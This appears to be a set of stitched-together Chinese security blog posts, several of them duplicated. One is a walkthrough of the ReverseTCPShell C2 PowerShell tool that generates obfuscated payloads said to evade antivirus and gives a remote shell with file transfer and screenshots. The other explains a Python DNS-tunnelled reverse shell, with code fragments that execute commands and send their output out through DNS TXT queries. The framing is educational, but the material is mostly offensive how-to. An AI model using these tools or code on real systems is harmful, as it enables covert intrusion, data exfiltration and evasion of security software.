ReverseTCPShell C2是一款powershell编写的反弹shell工具，流量经过AES加密，payload通过三种混淆方式可绕过一些杀软的检测。
测试：
1. 在文件目录下启动powershell
2. .ReverseTCP.ps1 ,启动程序
会出现这个界面，功能介绍，设置好lhost和lport（监听地址及端口）
Modules (模块)   | - Show C2-Server Modules.(显示c2服务器模块)Info (信息)     
 | - Show Remote-Host Info.(显示远程主机信息)Upload (上传)   
 | - Upload File from Local-Host to Remote-Host.(上传文件从本地主机到远程主机。)Download(下载)  
 | - Download File from Remote-Host to Local-Host.(从远程主机下载文件到本地主机。)Screenshot (截图)
 | - Save Screenshot from Remote-Host to Local-Host.(保存屏幕截图从远程主机到本地主机。)
可以看到三种混淆方式
这里我选择的是base64，生成powershell和cmd的payload
复制出cmd的payload，靶机执行
靶机上线，杀软未提示和拦截
执行命令ipconfig
可直接执行shell命令 ，截图经常报错，远程文件上传和下载，方便后渗透的进行，可进一步利用。

ReverseTCPShell C2 反弹shell工具
ReverseTCPShell C2是一款powershell编写的反弹shell工具，流量经过AES加密，payload通过三种混淆方式可绕过一些杀软的检测。
Github下载地址：https://github.com/ZHacker13/ReverseTCPShell

1、在文件目录下启动powershell



2、.\ReverseTCP.ps1  启动程序
**
注：若出现以下错误，请更改执行策略
**



报错：无法加载文件 ******.ps1，因为在此系统中禁止执行脚本。有关详细信息。
set-executionpolicy remotesigned

默认值改为：Y



再次.\ReverseTCP.ps1



功能介绍，设置好lhost和lport（监听地址及端口）

Modules (模块)   | - Show C2-Server Modules.(显示c2服务器模块)

Info (信息)      | - Show Remote-Host Info.(显示远程主机信息)

Upload (上传)    | - Upload File from Local-Host to Remote-Host.(上传文件从本地主机到远程主机。)

Download(下载)   | - Download File from Remote-Host to Local-Host.(从远程主机下载文件到本地主机。)

Screenshot (截图) | - Save Screenshot from Remote-Host to Local-Host.(保存屏幕截图从远程主机到本地主机。)
可以看到三种混淆方式



这里选择的是base64，生成powershell和cmd的payload



复制出cmd的payload，靶机执行


本地powershell开启监听，靶机上线，杀软未提示和拦截



可直接执行shell命令、远程文件上传和下载，方便后渗透的进行，可进一步利用。

0X01 引子
反弹Shell广泛应用于远程控制下的权限维持，通过反转攻（客户端）和受（服务端）的角色，来实现条件限制，尤其是内网情况下的远程连接。
反弹Shell的工具和实现方法多种多样，只要能够让被控端通过网络发送数据到控制端，并且实现数据的解析即可完成控制过程。
最近在继续了解网络协议，于是突然想在DNS数据包中插入一些伪造的命令来实现解析，本来准备自己尝试写一个DNS服务器和DNS请求程序来实现反弹，不过刚动笔就看到了别人开源的程序，于是直接使用别人的程序来学习了。
https://github.com/ahhh/Reverse_DNS_Shell
为了运行测试更方便，去掉了程序中的加解密功能，额外的Python包只需要dns和dnslib
0X02 DNS
为了关联主机和IP地址对应关系而诞生的DNS本身，不需要我在这里赘述了。跳过域名构成、查询过程等可以轻松在网络查询到的内容，我们直接来看看DNS的包构成

在smtp那篇文章中，我们提过一层一层洋葱状的协议包裹，在这里，我们跳过以太、IP、UDP头，直接到DNS数据的部分。
标志着数据开始的是Tran ID段，所有的问答信息都需要一定的机制来保证对应，这部分应该就是对应机制中的一部分。
紧接着的Flags，0x0100表明了一些查询属性。
Queries中是我们所要查询的host，查询类型。作为A类型查询，得到的是host的IP，这里也是我们做手脚的地方，不过TXT类型可以插入一些附加的信息，更适合我们用来构造命令语句。
服务器回应包如下：
作为回应的Tran ID，它和查询包相同。
Flags中标准回应标志位
重复显示的Queries
回应的Answers信息。通过CNAME查取主机规范名，再通过规范名查取对应IP。
利用这种相互应答的特性，我们初步计划通过以下流程来实现我们的反弹Shell

0X03 程序
原始的程序可以在上面的github中找到，这里贴出我们去掉加解密的部分程序。
先说DNS服务器的部分

这一部分封装了对DNS的应答，payload里是被控端发来的查询信息，也就是上一次命令执行后的回显，而out是我们这一次的命令，封装成了TXT的应答包

这部分对于被控端的查询包进行解析，从中获取到地址和数据，对于数据，解析出其中的命令回显，并且初始化一个应答包。
主函数中使用socket监听相关端口，对于监听到的包按照预定流程进行处理。
再来看看被控端发送的部分

首先是整个流程一览，从程序中可以很清晰的看到建立连接，解析命令，执行命令，发送回显的过程。


构造的url，也就是命令回显，对于没有命令的，会返回nxt。利用回显构造查询语句。

这两段程序对于收到的文本格式的命令进行解析和执行，没有太多的东西可以讲。只是注意格式的截取，并且考虑对Linux和Windows的命令之间转换。

这部分负责发送DNS查询，按照与服务器约定的格式构造包并且进行发送。
0X04 测试
我们需要先执行服务器端程序，然后执行被控端程序。我的服务端程序在一台Ubuntu主机上，被控端在我的Win10机器上。


这是被控端第一次连接时发送的包，因为控制端还没有指令，第一次连接发送的是空包，其中Name的值bnh0就是我之前所说的NXT

而第二个包就是控制端发送的指令，在TXT中发送的就是指令whoami的base64编码，
可以对比和我之前实际抓包的不同之处，对照可以看出我们在DNS包的哪些地方做过修改。
0X05 延伸
其实相关的DNS隧道技术原理应该差不多，都是在本来应该放DNS规定信息的地方放入了其他的东西，来达到一些意想不到的结果。
当然，RFC还有许多协议可以让我随意构造去做测试，下一步考虑写一个多协议支持的Fuzzing工具 ：）

0X01 引子
反弹Shell广泛应用于远程控制下的权限维持，通过反转攻(客户端)和受(服务端)的角色，来实现条件限制，尤其是内网情况下的远程连接。
反弹Shell的工具和实现方法多种多样，只要能够让被控端通过网络发送数据到控制端，并且实现数据的解析即可完成控制过程。
最近在继续了解网络协议，于是突然想在DNS数据包中插入一些伪造的命令来实现解析，本来准备自己尝试写一个DNS服务器和DNS请求程序来实现反弹，不过刚动笔就看到了别人开源的程序，于是直接使用别人的程序来学习了。
为了运行测试更方便，去掉了程序中的加解密功能，额外的Python包只需要dns和dnslib
0X02 DNS
为了关联主机和IP地址对应关系而诞生的DNS本身，不需要我在这里赘述了。跳过域名构成、查询过程等可以轻松在网络查询到的内容，我们直接来看看DNS的包构成
在smtp那篇文章中，我们提过一层一层洋葱状的协议包裹，在这里，我们跳过以太、IP、UDP头，直接到DNS数据的部分。
标志着数据开始的是Tran ID段，所有的问答信息都需要一定的机制来保证对应，这部分应该就是对应机制中的一部分。
紧接着的Flags，0x0100表明了一些查询属性。
Queries中是我们所要查询的host，查询类型。作为A类型查询，得到的是host的IP，这里也是我们做手脚的地方，不过TXT类型可以插入一些附加的信息，更适合我们用来构造命令语句。
服务器回应包如下：
作为回应的Tran ID，它和查询包相同。 Flags中标准回应标志位 重复显示的Queries
回应的Answers信息。通过CNAME查取主机规范名，再通过规范名查取对应IP。
利用这种相互应答的特性，我们初步计划通过以下流程来实现我们的反弹Shell
0X03 程序
原始的程序可以在上面的github中找到，这里贴出我们去掉加解密的部分程序。
先说DNS服务器的部分
1 2 3 4 5 6 7 8 def spawnShell(answer, payload): shellInput =
raw_input(PROMPT) if shellInput == 'quit': EXIT = 1 if shellInput
== '': spawnShell(answer, payload) out =
base64.b64encode(shellInput) answer.add_answer(
*dnslib.RR.fromZone('{}.com 60 TXT "{}"'.format(payload, out)))
return answer
这一部分封装了对DNS的应答，payload里是被控端发来的查询信息，也就是上一次命令执行后的回显，而out是我们这一次的命令，封装成了TXT的应答包
1 2 3 4 5 6 def recievePayload(udps): data, addr =
udps.recvfrom(1024) dnsD = dnslib.DNSRecord.parse(data) payload =
dnsD.questions[0].qname.label[0] answer = dnsD.reply() return addr,
payload, answer
这部分对于被控端的查询包进行解析，从中获取到地址和数据，对于数据，解析出其中的命令回显，并且初始化一个应答包。
主函数中使用socket监听相关端口，对于监听到的包按照预定流程进行处理。
再来看看被控端发送的部分
1 2 3 4 5 6 def start(host): while 1: a = startConnection(host) cmd
= parseCmd(a) stdoutput = runCmd(cmd) sendOutputToServer(stdoutput,
host)
首先是整个流程一览，从程序中可以很清晰的看到建立连接，解析命令，执行命令，发送回显的过程。
1 2 3 4 5 6 def startConnection(host): url = formURL(nextCommand)
request = dns.message.make_query(url, dns.rdatatype.TXT) answers =
dns.query.udp(request, host) a = answers.to_text() return a
构造的url，也就是命令回显，对于没有命令的，会返回nxt。利用回显构造查询语句。
1 2 def parseCmd(a): def runCmd(cmd)
这两段程序对于收到的文本格式的命令进行解析和执行，没有太多的东西可以讲。只是注意格式的截取，并且考虑对Linux和Windows的命令之间转换。
1 2 3 4 5 6 7 8 9 10 11 12 13 def sendOutputToServer(output, host):
send ='' output_end = len(output) for chunk in output: send +=
chunk output_end -= 1 if len(send) == 58: url = formURL(send)
dnsMakeQuery(url, host) send ='' if output_end == 0: url =
formURL(send) dnsMakeQuery(url, host)
这部分负责发送DNS查询，按照与服务器约定的格式构造包并且进行发送。
0X04 测试
我们需要先执行服务器端程序，然后执行被控端程序。我的服务端程序在一台Ubuntu主机上，被控端在我的Win10机器上。
如图，是在Ubuntu上对Win10执行ipconfig命令的显示。
我们再进行抓包分析：
这是被控端第一次连接时发送的包，因为控制端还没有指令，第一次连接发送的是空包，其中Name的值bnh0就是我之前所说的NXT
而第二个包就是控制端发送的指令，在TXT中发送的就是指令whoami的base64编码，
可以对比和我之前实际抓包的不同之处，对照可以看出我们在DNS包的哪些地方做过修改。
0X05 延伸
其实相关的DNS隧道技术原理应该差不多，都是在本来应该放DNS规定信息的地方放入了其他的东西，来达到一些意想不到的结果。
当然，RFC还有许多协议可以让我随意构造去做测试，下一步考虑写一个多协议支持的Fuzzing工具 ：)